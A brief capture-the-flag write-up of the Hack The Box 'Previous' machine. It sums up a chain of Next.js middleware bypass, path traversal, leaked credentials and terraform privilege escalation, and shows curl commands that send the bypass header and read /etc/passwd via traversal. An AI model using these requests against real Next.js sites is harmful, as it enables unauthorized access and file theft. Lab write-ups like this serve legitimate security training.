Previous

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux

Date: 2025-11-07

Author: x4cc3

Executive Summary

Previous is a Medium Linux machine running a Next.js web application. CVE-2025-29927 (middleware bypass) allows unauthorized access to a path traversal vulnerability in /api/download?example=. The LFI leaks the NextAuth configuration with hardcoded credentials jeremy:MyNameIsJeremyAndILovePancakes. SSH access reveals terraform with !env_reset — enabling TF_CLI_CONFIG_FILE hijack to execute a malicious provider binary as root.

Recon — Port Scan

rustscan -a 10.10.11.83

22/tcp	SSH
80/tcp	HTTP — Next.js

Exploitation

CVE-2025-29927 — Next.js Middleware Bypass

Landing page

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" <http://previous.htb/docs>

The middleware bypass revealed a path traversal via /api/download?example=:

curl -H "x-middleware-subrequest: middleware:..." "<http://previous.htb/api/download?example=../../../etc/passwd>"

Executive Summary

Recon — Port Scan

Exploitation

CVE-2025-29927 — Next.js Middleware Bypass

Credential Leak via LFI